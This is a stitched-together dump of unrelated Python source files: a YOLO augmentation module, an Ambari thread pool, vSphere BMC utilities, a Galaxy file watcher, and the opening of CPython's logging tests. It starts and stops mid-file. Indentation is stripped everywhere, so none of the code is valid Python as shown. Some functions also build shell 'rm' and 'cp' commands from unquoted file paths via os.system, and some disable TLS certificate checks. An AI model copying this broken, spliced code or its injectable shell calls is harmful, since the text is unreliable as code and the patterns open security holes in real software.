x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='path/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def recursive_dataset2bmp(dataset='path/dataset_bmp'): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + '/' + file
s = Path(file).suffix
if s == '.txt': # replace text
with open(p, 'r') as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, '.bmp')
with open(p, 'w') as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
if s != '.bmp':
os.system("rm '%s'" % p)
def imagelist2folder(path='path/images.txt'): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, 'r') as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
threadpool.py
|
"""
Generic thread pool class. Modeled after Java's ThreadPoolExecutor.
Please note that this ThreadPool does *not* fully implement the PEP 3148
ThreadPool!
"""
from threading import Thread, Lock, currentThread
from weakref import ref
import logging
from ambari_agent.ExitHelper import ExitHelper
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
logger = logging.getLogger(__name__)
_threadpools = set()
# Worker threads are daemonic in order to let the interpreter exit without
# an explicit shutdown of the thread pool. The following trick is necessary
# to allow worker threads to finish cleanly.
def _shutdown_all():
for pool_ref in tuple(_threadpools):
pool = pool_ref()
if pool:
pool.shutdown()
ExitHelper().register(_shutdown_all)
class ThreadPool(object):
def __init__(self, core_threads=0, max_threads=20, keepalive=1, context_injector=None, agent_config=None):
"""
:param core_threads: maximum number of persistent threads in the pool
:param max_threads: maximum number of total threads in the pool
:param thread_class: callable that creates a Thread object
:param keepalive: seconds to keep non-core worker threads waiting
for new tasks
:type context_injector func
:type agent_config AmbariConfig.AmbariConfig
"""
self.core_threads = core_threads
self.max_threads = max(max_threads, core_threads, 1)
self.keepalive = keepalive
self._queue = Queue()
self._threads_lock = Lock()
self._threads = set()
self._shutdown = False
self._job_context_injector = context_injector
self._agent_config = agent_config
_threadpools.add(ref(self))
logger.info('Started thread pool with %d core threads and %s maximum '
'threads', core_threads, max_threads or 'unlimited')
def _adjust_threadcount(self):
self._threads_lock.acquire()
try:
if self.num_threads < self.max_threads:
self._add_thread(self.num_threads < self.core_threads)
finally:
self._threads_lock.release()
def _add_thread(self, core):
t = Thread(target=self._run_jobs, args=(core,))
t.setDaemon(True)
t.start()
self._threads.add(t)
def _run_jobs(self, core):
logger.debug('Started worker thread')
block = True
timeout = None
if not core:
block = self.keepalive > 0
timeout = self.keepalive
if self._job_context_injector is not None:
self._job_context_injector(self._agent_config)
while True:
try:
func, args, kwargs = self._queue.get(block, timeout)
except Empty:
break
if self._shutdown:
break
try:
func(*args, **kwargs)
except:
logger.exception('Error in worker thread')
self._threads_lock.acquire()
self._threads.remove(currentThread())
self._threads_lock.release()
logger.debug('Exiting worker thread')
@property
def num_threads(self):
return len(self._threads)
def submit(self, func, *args, **kwargs):
if self._shutdown:
raise RuntimeError('Cannot schedule new tasks after shutdown')
self._queue.put((func, args, kwargs))
self._adjust_threadcount()
def shutdown(self, wait=True):
if self._shutdown:
return
logging.info('Shutting down thread pool')
self._shutdown = True
_threadpools.remove(ref(self))
self._threads_lock.acquire()
for _ in range(self.num_threads):
self._queue.put((None, None, None))
self._threads_lock.release()
if wait:
self._threads_lock.acquire()
threads = tuple(self._threads)
self._threads_lock.release()
for thread in threads:
thread.join()
def __repr__(self):
if self.max_threads:
threadcount = '%d/%d' % (self.num_threads, self.max_threads)
else:
threadcount = '%d' % self.num_threads
return '<ThreadPool at %x; threads=%s>' % (id(self), threadcount)
|
utils.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import hashlib
import os
import re
import ssl
import sys
import urllib.parse
import urllib.request
from threading import Thread
from pyVim.connect import Disconnect, SmartConnect
from pyVmomi import vim, vmodl
from vbmc4vsphere import exception
class viserver_open(object):
def __init__(self, vi, vi_username=None, vi_password=None, readonly=False):
self.vi = vi
self.vi_username = vi_username
self.vi_password = vi_password
self.readonly = readonly
def __enter__(self):
context = None
if hasattr(ssl, "_create_unverified_context"):
context = ssl._create_unverified_context()
try:
self.conn = SmartConnect(
host=self.vi,
user=self.vi_username,
pwd=self.vi_password,
# port=self.vi_port,
sslContext=context,
)
if not self.conn:
raise Exception
except Exception as e:
raise exception.VIServerConnectionOpenError(vi=self.vi, error=e)
return self.conn
def __exit__(self, type, value, traceback):
_ = Disconnect(self.conn)
def get_obj(conn, root, vim_type):
container = conn.content.viewManager.CreateContainerView(root, vim_type, True)
view = container.view
container.Destroy()
return view
def create_filter_spec(pc, vms, prop):
objSpecs = []
for vm in vms:
objSpec = vmodl.query.PropertyCollector.ObjectSpec(obj=vm)
objSpecs.append(objSpec)
filterSpec = vmodl.query.PropertyCollector.FilterSpec()
filterSpec.objectSet = objSpecs
propSet = vmodl.query.PropertyCollector.PropertySpec(all=False)
propSet.type = vim.VirtualMachine
propSet.pathSet = [prop]
filterSpec.propSet = [propSet]
return filterSpec
def filter_results(result, value):
vms = []
for o in result.objects:
if o.propSet[0].val == value:
vms.append(o.obj)
return vms
def get_viserver_vm(conn, vm):
try:
vms = get_obj(conn, conn.content.rootFolder, [vim.VirtualMachine])
pc = conn.content.propertyCollector
filter_spec = create_filter_spec(pc, vms, "name")
options = vmodl.query.PropertyCollector.RetrieveOptions()
result = pc.RetrievePropertiesEx([filter_spec], options)
vms = filter_results(result, vm)
if len(vms) != 1:
raise Exception
return vms[0]
except Exception:
raise exception.VMNotFound(vm=vm)
def get_bootable_device_type(conn, boot_dev):
if isinstance(boot_dev, vim.vm.BootOptions.BootableFloppyDevice):
return "floppy"
elif isinstance(boot_dev, vim.vm.BootOptions.BootableDiskDevice):
return "disk"
elif isinstance(boot_dev, vim.vm.BootOptions.BootableCdromDevice):
return "cdrom"
elif isinstance(boot_dev, vim.vm.BootOptions.BootableEthernetDevice):
return "ethernet"
def set_boot_device(conn, vm, device):
"""Set boot device to specified device.
https://github.com/ansible-collections/vmware/blob/main/plugins/module_utils/vmware.py
"""
boot_order_list = []
if device == "cdrom":
bootable_cdroms = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualCdrom)
]
if bootable_cdroms:
boot_order_list.append(vim.vm.BootOptions.BootableCdromDevice())
elif device == "disk":
bootable_disks = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualDisk)
]
if bootable_disks:
boot_order_list.extend(
[
vim.vm.BootOptions.BootableDiskDevice(deviceKey=bootable_disk.key)
for bootable_disk in bootable_disks
]
)
elif device == "ethernet":
bootable_ethernets = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualEthernetCard)
]
if bootable_ethernets:
boot_order_list.extend(
[
vim.vm.BootOptions.BootableEthernetDevice(
deviceKey=bootable_ethernet.key
)
for bootable_ethernet in bootable_ethernets
]
)
elif device == "floppy":
bootable_floppy = [
dev
for dev in vm.config.hardware.device
if isinstance(dev, vim.vm.device.VirtualFloppy)
]
if bootable_floppy:
boot_order_list.append(vim.vm.BootOptions.BootableFloppyDevice())
kwargs = dict()
kwargs.update({"bootOrder": boot_order_list})
vm_conf = vim.vm.ConfigSpec()
vm_conf.bootOptions = vim.vm.BootOptions(**kwargs)
vm.ReconfigVM_Task(vm_conf)
return
def send_nmi(conn, vm):
"""Send NMI to specified VM.
https://github.com/vmware/pyvmomi/issues/726
"""
context = None
if hasattr(ssl, "_create_unverified_context"):
context = ssl._create_unverified_context()
vmx_path = vm.config.files.vmPathName
for ds_url in vm.config.datastoreUrl:
vmx_path = vmx_path.replace("[%s] " % ds_url.name, "%s/" % ds_url.url)
url = "https://%s/cgi-bin/vm-support.cgi?manifests=%s&vm=%s" % (
vm.runtime.host.name,
urllib.parse.quote_plus("HungVM:Send_NMI_To_Guest"),
urllib.parse.quote_plus(vmx_path),
)
spec = vim.SessionManager.HttpServiceRequestSpec(method="httpGet", url=url)
ticket = conn.content.sessionManager.AcquireGenericServiceTicket(spec)
headers = {
"Cookie": "vmware_cgi_ticket=%s" % ticket.id,
}
req = urllib.request.Request(url, headers=headers)
Thread(
target=urllib.request.urlopen, args=(req,), kwargs={"context": context}
).start()
def check_viserver_connection_and_vm(vi, vm, vi_username=None, vi_password=None):
with viserver_open(
vi, readonly=True, vi_username=vi_username, vi_password=vi_password
) as conn:
get_viserver_vm(conn, vm)
def is_pid_running(pid):
try:
os.kill(pid, 0)
return True
except OSError:
return False
def str2bool(string):
lower = string.lower()
if lower not in ("true", "false"):
raise ValueError('Value "%s" can not be interpreted as ' "boolean" % string)
return lower == "true"
def mask_dict_password(dictionary, secret="***"):
"""Replace passwords with a secret in a dictionary."""
d = dictionary.copy()
for k in d:
if "password" in k:
d[k] = secret
return d
def generate_fakemac_by_vm_name(vm_name):
hash = hashlib.md5(vm_name.encode()).digest()
fakemac = ":".join(
"%02x" % b for b in [0x02, 0x00, 0x00, hash[0], hash[1], hash[2]]
)
return fakemac
def convert_fakemac_string_to_bytes(fakemac_str):
fakemac_bytes = [int(b, 16) for b in re.split(":|-", fakemac_str)]
return fakemac_bytes
class detach_process(object):
"""Detach the process from its parent and session."""
def _fork(self, parent_exits):
try:
pid = os.fork()
if pid > 0 and parent_exits:
os._exit(0)
return pid
except OSError as e:
raise exception.DetachProcessError(error=e)
def _change_root_directory(self):
"""Change to root directory.
Ensure that our process doesn't keep any directory in use. Failure
to do this could make it so that an administrator couldn't
unmount a filesystem, because it was our current directory.
"""
try:
os.chdir("/")
except Exception as e:
error = "Failed to change root directory. Error: %s" % e
raise exception.DetachProcessError(error=error)
def _change_file_creation_mask(self):
"""Set the umask for new files.
Set the umask for new files the process creates so that it does
have complete control over the permissions of them. We don't
know what umask we may have inherited.
"""
try:
os.umask(0)
except Exception as e:
error = "Failed to change file creation mask. Error: %s" % e
raise exception.DetachProcessError(error=error)
def __enter__(self):
pid = self._fork(parent_exits=False)
if pid > 0:
return pid
os.setsid()
self._fork(parent_exits=True)
self._change_root_directory()
self._change_file_creation_mask()
sys.stdout.flush()
sys.stderr.flush()
si = open(os.devnull, "r")
so = open(os.devnull, "a+")
se = open(os.devnull, "a+")
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
return pid
def __exit__(self, type, value, traceback):
pass
|
watcher.py
|
import logging
import os.path
import threading
import time
try:
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
can_watch = True
except ImportError:
Observer = None
FileSystemEventHandler = object
PollingObserver = None
can_watch = False
from galaxy.util.hash_util import md5_hash_file
from galaxy.util.postfork import register_postfork_function
log = logging.getLogger( __name__ )
def get_observer_class(config_value, default, monitor_what_str):
"""
"""
config_value = config_value or default
config_value = str(config_value).lower()
if config_value in ("true", "yes", "on", "auto"):
expect_observer = True
observer_class = Observer
elif config_value == "polling":
expect_observer = True
observer_class = PollingObserver
elif config_value in ('false', 'no', 'off'):
expect_observer = False
observer_class = None
else:
message = "Unrecognized value for watch_tools config option: %s" % config_value
raise Exception(message)
if expect_observer and observer_class is None:
message = "Watchdog library unavailable, cannot monitor %s." % monitor_what_str
if config_value == "auto":
log.info(message)
else:
raise Exception(message)
return observer_class
def get_tool_conf_watcher(reload_callback):
return ToolConfWatcher(reload_callback)
def get_tool_watcher(toolbox, config):
config_value = getattr(config, "watch_tools", None)
observer_class = get_observer_class(config_value, default="False", monitor_what_str="tools")
if observer_class is not None:
return ToolWatcher(toolbox, observer_class=observer_class)
else:
return NullWatcher()
class ToolConfWatcher(object):
def __init__(self, reload_callback):
self.paths = {}
self._active = False
self._lock = threading.Lock()
self.thread = threading.Thread(target=self.check, name="ToolConfWatcher.thread")
self.thread.daemon = True
self.event_handler = ToolConfFileEventHandler(reload_callback)
def start(self):
if not self._active:
self._active = True
register_postfork_function(self.thread.start)
def shutdown(self):
if self._active:
self._active = False
self.thread.join()
def check(self):
hashes = { key: None for key in self.paths.keys() }
while self._active:
do_reload = False
with self._lock:
paths = list(self.paths.keys())
for path in paths:
if not os.path.exists(path):
continue
mod_time = self.paths[path]
if not hashes.get(path, None):
hashes[path] = md5_hash_file(path)
new_mod_time = None
if os.path.exists(path):
new_mod_time = time.ctime(os.path.getmtime(path))
if new_mod_time != mod_time:
new_hash = md5_hash_file(path)
if hashes[path] != new_hash:
self.paths[path] = new_mod_time
hashes[path] = new_hash
log.debug("The file '%s' has changes.", path)
do_reload = True
if do_reload:
with self._lock:
t = threading.Thread(target=self.event_handler.on_any_event)
t.daemon = True
t.start()
time.sleep(1)
def monitor(self, path):
mod_time = None
if os.path.exists(path):
mod_time = time.ctime(os.path.getmtime(path))
with self._lock:
self.paths[path] = mod_time
self.start()
def watch_file(self, tool_conf_file):
self.monitor(tool_conf_file)
self.start()
class NullToolConfWatcher(object):
def start(self):
pass
def shutdown(self):
pass
def monitor(self, conf_path):
pass
def watch_file(self, tool_file, tool_id):
pass
class ToolConfFileEventHandler(FileSystemEventHandler):
def __init__(self, reload_callback):
self.reload_callback = reload_callback
def on_any_event(self, event=None):
self._handle(event)
def _handle(self, event):
self.reload_callback()
class ToolWatcher(object):
def __init__(self, toolbox, observer_class):
self.toolbox = toolbox
self.tool_file_ids = {}
self.tool_dir_callbacks = {}
self.monitored_dirs = {}
self.observer = observer_class()
self.event_handler = ToolFileEventHandler(self)
self.start()
def start(self):
register_postfork_function(self.observer.start)
def shutdown(self):
self.observer.stop()
self.observer.join()
def monitor(self, dir):
self.observer.schedule(self.event_handler, dir, recursive=False)
def watch_file(self, tool_file, tool_id):
tool_file = os.path.abspath( tool_file )
self.tool_file_ids[tool_file] = tool_id
tool_dir = os.path.dirname( tool_file )
if tool_dir not in self.monitored_dirs:
self.monitored_dirs[ tool_dir ] = tool_dir
self.monitor( tool_dir )
def watch_directory(self, tool_dir, callback):
tool_dir = os.path.abspath( tool_dir )
self.tool_dir_callbacks[tool_dir] = callback
if tool_dir not in self.monitored_dirs:
self.monitored_dirs[ tool_dir ] = tool_dir
self.monitor( tool_dir )
class ToolFileEventHandler(FileSystemEventHandler):
def __init__(self, tool_watcher):
self.tool_watcher = tool_watcher
def on_any_event(self, event):
self._handle(event)
def _handle(self, event):
# modified events will only have src path, move events will
# have dest_path and src_path but we only care about dest. So
# look at dest if it exists else use src.
path = getattr( event, 'dest_path', None ) or event.src_path
path = os.path.abspath( path )
tool_id = self.tool_watcher.tool_file_ids.get( path, None )
if tool_id:
try:
self.tool_watcher.toolbox.reload_tool_by_id(tool_id)
except Exception:
pass
elif path.endswith(".xml"):
directory = os.path.dirname( path )
dir_callback = self.tool_watcher.tool_dir_callbacks.get( directory, None )
if dir_callback:
tool_file = event.src_path
tool_id = dir_callback( tool_file )
if tool_id:
self.tool_watcher.tool_file_ids[ tool_file ] = tool_id
class NullWatcher(object):
def start(self):
pass
def shutdown(self):
pass
def watch_file(self, tool_file, tool_id):
pass
def watch_directory(self, tool_dir, callback):
pass
|
test_logging.py
|
# Copyright 2001-2014 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2014 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog
except ImportError:
win32evtlog = None
try:
import win32evtlogutil
except ImportError:
win32evtlogutil = None
win32evtlog = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
#Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
